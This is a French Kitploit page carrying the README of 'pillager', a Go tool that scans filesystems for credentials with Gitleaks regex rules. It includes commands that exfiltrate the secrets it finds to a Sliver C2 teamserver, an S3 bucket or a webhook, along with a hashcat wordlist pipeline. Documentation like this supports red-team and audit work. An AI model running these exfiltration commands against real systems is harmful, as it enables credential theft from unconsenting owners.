Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
pillager — Piller les systèmes de fichiers pour des informations sensibles avec Go 🔍 | Kitploit
Outils/GitHubGitHub/brittonhayes/pillager
Scanners de VulnérabilitésExfiltration de DonnéesCollecte d'InformationsTests d'IntrusionUtilitaires et FrameworksDétection de SecretsRed Teaming
GitHubbrittonhayes/pillager

pillager

Piller les systèmes de fichiers pour des informations sensibles avec Go 🔍

Voir le dépôt
311224il y a 9 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Pillager

Go Reference Latest Release Go Report Card Tests

Pillez les systèmes de fichiers pour trouver des informations sensibles avec Go.

Table des matières

  1. Résumé
  2. Installation
  3. Utilisation
  4. Exfiltration
  5. Documentation

Résumé

Pillager est conçu pour offrir un moyen simple d'exploiter le puissant modèle de concurrence de Go afin de rechercher récursivement des informations sensibles dans les fichiers d'un répertoire. Pillager y parvient en s'appuyant sur . Une fois que Pillager trouve des fichiers correspondant au motif spécifié, le fichier est scanné à l'aide d'une série de travailleurs simultanés qui prennent chacun une ligne du fichier dans la file d'attente des tâches et recherchent des correspondances de motifs sensibles. Les filtres de motifs disponibles peuvent être définis dans un fichier ou vous pouvez utiliser l'ensemble de règles par défaut.

quelques géants
pillager.toml

Installation

Go

Si vous avez Go installé sur votre système, vous pouvez installer Pillager avec go install

root@kitploit:~
go install github.com/brittonhayes/pillager@latest

Scoop (Windows)

root@kitploit:~
scoop bucket add pillager https://github.com/brittonhayes/pillager-scoop.git
scoop install pillager

Homebrew (OSX/Linux)

root@kitploit:~
brew tap brittonhayes/homebrew-pillager
brew install pillager

Image Docker

root@kitploit:~
docker run --rm -it ghcr.io/brittonhayes/pillager:latest hunt .

Si vous cherchez un binaire, consultez les dernières versions pour l'exécutable correspondant à votre système.

Utilisation

Pour voir toutes les commandes disponibles avec pillager

root@kitploit:~
# Pour voir les instructions pour l'ensemble de l'application
pillager

# Depuis n'importe quelle sous-commande
pillager [cmd] --help

Interface utilisateur

Pillager fournit une interface utilisateur en terminal construite avec bubbletea si vous souhaitez scanner les secrets de manière interactive.

asciicast

Exfiltration

Envoyez les secrets découverts vers des destinations distantes : Sliver C2 (stockage de butin/credentials), S3/MinIO (stockage cloud) ou Webhooks (points de terminaison HTTP personnalisés).

root@kitploit:~
# Sliver C2 - Envoyer au teamserver avec analyse des credentials
pillager hunt /target --exfil sliver \
  --sliver-config ~/.sliver-client/configs/operator.cfg

# S3/MinIO - Téléversement avec chiffrement
pillager hunt /target --exfil s3 \
  --s3-bucket red-team-findings \
  --s3-endpoint https://minio.internal:9000 \
  --exfil-encrypt env:EXFIL_KEY

# Webhook - POST vers un point de terminaison personnalisé
pillager hunt /target --exfil webhook \
  --webhook-url https://your-server.com/findings \
  --webhook-header "Authorization: Bearer token"

Sécurité : Chiffrement AES-256-GCM (--exfil-encrypt), TLS par défaut, métadonnées automatiques (nom d'hôte, horodatage)


Configuration

Règles Gitleaks

Pillager offre un support complet des règles Gitleaks1. Celles-ci peuvent être passées dans une section rules2 de votre fichier pillager.toml, ou vous pouvez utiliser l'ensemble de règles par défaut en laissant le champ de configuration vide.

root@kitploit:~
# pillager.toml
# Configuration de base
verbose = false 
redact = false 

# Règles pour la détection de secrets
[[rules]]
description = "AWS Access Key"
id = "aws-access-key"
regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'''
tags = ["aws", "credentials"]

[[rules]]
description = "AWS Secret Key"
id = "aws-secret-key"
regex = '''(?i)aws(.{0,20})?(?-i)['\"][0-9a-zA-Z\/+]{40}['\"]'''
tags = ["aws", "credentials"]

[[rules]]
description = "GitHub Token"
id = "github-token"
regex = '''ghp_[0-9a-zA-Z]{36}'''
tags = ["github", "token"]

[[rules]]
description = "Private Key"
id = "private-key"
regex = '''-----BEGIN (?:RSA|OPENSSH|DSA|EC|PGP) PRIVATE KEY( BLOCK)?-----'''
tags = ["key", "private"]

# Configuration de la liste blanche
[allowlist]
paths = [
    ".*/_test\\.go$",
    ".*/testdata/.*",
    ".*\\.md$",
    ".*/vendor/.*"
]
regexes = [
    "EXAMPLE_KEY",
    "DUMMY_SECRET"
] 

Formats de sortie intégrés

Pillager dispose d'une série de formats de sortie intégrés disponibles. Choisissez votre préféré !

Basique

root@kitploit:~
pillager hunt .

JSON

root@kitploit:~
pillager hunt ./example -f json | jq

La sortie JSON est conçue pour fonctionner parfaitement avec l'excellente utilitaire jq pour un parsing facile.

Wordlist

root@kitploit:~
# Utilisez pillager pour générer une wordlist délimitée par des sauts de ligne à partir des résultats
pillager hunt . -f wordlist 
root@kitploit:~
# Utilisez pillager pour ajouter une wordlist, puis utilisez votre mode d'attaque hashcat préféré
pillager hunt ./ -f wordlist >> rockyou.txt && hashcat -a 0 hash.txt rockyou.txt
Cliquez pour voir plus de formats de sortie

JSON Pretty

root@kitploit:~
pillager hunt . -f json-pretty

HTML

root@kitploit:~
pillager hunt . -f html > results.html

Markdown

root@kitploit:~
pillager hunt . -f markdown > results.md

CSV

root@kitploit:~
pillager hunt . -f csv > results.csv

Template Go personnalisé

root@kitploit:~
pillager hunt . --template "{{ range .}}Secret: {{.Secret}}{{end}}"

Template Go personnalisé depuis un fichier

root@kitploit:~
pillager hunt . -t "$(cat mytemplate.tmpl)"

Templates personnalisés

Pillager vous permet d'utiliser les puissantes fonctions de go text/template et sprig pour personnaliser le format de sortie. Voici quelques exemples de templates.

Basique

root@kitploit:~
{{ range . -}}
    File: {{ .File }}
    Secret: {{ .Secret}}
    Description: {{ quote .Description }}
{{ end -}}

Style Markdown

root@kitploit:~
# Results

{{ range . -}}
    ## {{ .File }}
    - Location: {{.StartLine}}
{{end}}

Plus d'exemples de templates se trouvent dans le répertoire templates.

Documentation

La documentation GoDoc est disponible sur pkg.go.dev pour pillager.

Développement

Pour contribuer au développement de fonctionnalités et de correctifs pour Pillager, commencez par les étapes suivantes :

  • Installez Go
  • Installez Taskfile.dev
  • Lisez le CONTRIBUTING.MD

Sur les épaules de géants ⭐

spf13's Cobra

Qu'est-ce que Cobra ?

Cobra est une bibliothèque qui fournit une interface simple pour créer des interfaces CLI modernes et puissantes similaires à celles de git et des outils Go. Cobra est également une application qui générera l'échafaudage de votre application pour développer rapidement une application basée sur Cobra.

Si vous avez déjà vu une CLI écrite en Go, il y a de fortes chances qu'elle ait été construite avec Cobra. Je ne peux pas recommander cette bibliothèque assez. Elle permet aux développeurs de créer des outils en ligne de commande cohérents, dynamiques et auto-documentés avec facilité. Quelques exemples incluent kubectl, hugo, et la CLI gh de Github.

Gitleaks

Qu'est-ce que Gitleaks ?

Gitleaks1 est un outil SAST pour détecter les secrets codés en dur comme les mots de passe, les clés API et les jetons dans les dépôts git.

Gitleaks est un outil incroyable pour la prévention des fuites de secrets. Si vous n'avez pas encore implémenté Gitleaks comme vérificateur de pré-commit, cela vaut la peine de le découvrir.

Pourquoi Gitleaks est-il pertinent pour Pillager ?

Pillager implémente la puissante fonctionnalité de règles de Gitleaks tout en adoptant une approche différente pour présenter et gérer les secrets trouvés. Bien que j'aie fourni un ensemble de règles par défaut de base, Pillager devient beaucoup plus puissant si vous permettez aux utilisateurs de créer leurs propres règles pour leurs cas d'usage.

Consultez les règles incluses2 pour un ensemble de règles de base.


Cela va sans dire, mais je vais quand même le dire : je ne suis pas responsable des conséquences de votre utilisation de Pillager. Cet outil est destiné à un usage défensif, éducatif et à un usage par les chercheurs en sécurité avec le consentement de toutes les parties concernées. Tout comportement malveillant avec Pillager n'est en aucun cas cautionné ni encouragé. Veuillez utiliser cet outil de manière responsable et assurez-vous d'avoir l'autorisation de scanner les systèmes à la recherche de secrets avant de le faire.

Dans son essence, Pillager est conçu pour vous aider à déterminer si un système est affecté par des sources courantes de fuite de credentials, telles que documentées par le framework MITRE ATT&CK3.

Technique MITRE ATT&CK - T1552,003 - Credentials non sécurisés : Historique Bash

Technique MITRE ATT&CK - T1552,001 - Credentials non sécurisés : Credentials dans les fichiers

Footnotes

  1. https://raw.githubusercontent.com/brittonhayes/pillager/main/%5BGitleaks%5D(https:/github.com/gitleaks/gitleaks) ↩ ↩2

  2. Référence des règles Gitleaks ↩ ↩2

  3. Site web MITRE ATT&CK ↩

Télécharger l’outil